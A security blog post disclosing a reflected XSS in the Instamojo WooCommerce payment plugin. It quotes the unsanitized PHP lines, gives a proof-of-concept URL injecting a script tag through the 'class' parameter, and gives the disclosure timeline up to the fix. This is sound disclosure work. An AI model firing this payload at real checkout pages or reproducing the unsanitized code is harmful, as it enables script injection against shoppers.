Instamojo Woocommerce Plugin XSS

Posted by Ajin Abraham on Apr 13 2016

TL;DR

We are using Instamojo as a payment gateway for Indian customers in our security education platform OpSecX. Instamojo provides a plugin that can be used with WooCommerce. To ensure our customers safety we used to do a code review and security analysis on the plugins we use. Our security assessment revealed that Instamojo plugin is affected by a reflected cross site scripting (XSS).

We are using Instamojo as a payment gateway for Indian customers in our security education platform OpSecX. Instamojo provides a plugin that can be used with WooCommerce. To ensure our customers safety we used to do a code review and security analysis on the plugins we use. Our security assessment revealed that Instamojo plugin is affected by a reflected cross site scripting (XSS).

Vulnerable Plugin: https://wordpress.org/plugins/woo-instamojo/
Vulnerability Description: Instamojo plugin will introduce an XSS vulnerability to the checkout page of the website that uses WooCommerce due to the lack of user input sanitization.
Vulnerable File: woo-instamojo.php
Vulnerable Version: < 0.0.7
Vulnerable Code:

Line 65: $message_format = '<div class="%s">%s</div>'; 
Line 66: return sprintf($message_format, $_GET['class'], htmlentities(urldecode($_GET['msg'])));

You can see that the GET parameter “class” is not sanitized properly.

Exploit


http://site/index.php/checkout/order-received/?msg=hello&class="/><script>alert(0)</script>

HTML Rendering:

<div class="\"/><script>alert(/XSS/)</script>">hello</div>

xss

Disclosure Process

We notified Instamojo team about the vulnerability on 20-12-2015
They acknowledged the report on 30-12-2015
Vulnerability Fixed in version 0.0.7 on 15-03-2016


  • Tags: 
  • xss
  • instamojo xss

Ajin Abraham

  • |
  • |
  • |

Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security including 4 years of Security Research. He is passionate on developing new and unique security tools. Some of his contributions to Hacker's arsenal include OWASP Xenotix XSS Exploit Framework, Mobile Security Framework (MobSF), Xenotix xBOT, NodeJsScan etc to name a few. He has been invited to speak at multiple security conferences including ClubHack, Nullcon, OWASP AppSec Eu, OWASP AppSec AsiaPac, BlackHat Europe, Hackmiami, Confidence, BlackHat US, BlackHat Asia, ToorCon, Ground Zero Summit, Hack In Paris, Hack In the Box, c0c0n and PHDays.